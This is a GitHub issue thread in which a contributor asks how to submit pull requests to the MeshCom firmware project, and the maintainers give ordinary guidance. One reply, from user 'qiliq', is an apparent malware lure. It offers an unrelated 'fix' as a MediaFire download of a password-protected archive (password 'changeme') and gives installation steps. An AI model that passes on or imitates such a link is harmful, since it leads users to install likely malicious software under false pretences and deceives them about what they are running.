icssw-org/MeshCom-Firmware #45: How to contribute

ok1cdj, 2024-08-28:
Hello all, i would like to repair some bugs regarding different boards which i have. Is there some guide how to create pull requests ?
For example one/bug feature one pull request or it all together ?

Regards, Ondra OK1CDJ

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

rainerfritz, 2024-08-28:
Hi Ondra!

One bug and one pull request sounds fine!
The rest is the usual way -> Fork -> make changes or additions to the code -> create pull request.

BR
Rainer

ok1cdj, 2024-08-29:
Ok will make PR.

closed 2024-08-29 by ok1cdj

oe1kbc, 2024-08-29:
Hi Ondra,

i’ve pushed our latest updates (Version 4.33e) to the main branch. Please refer to this branch for your next requests.

 

Thank you for your help

 

73 de Kurt

OE1KBC

 

Ing. Kurt Baumann
T: +43 699 1200 3520
M:  ***@***.***> ***@***.***
H:  <https://icssw.org> https://icssw.org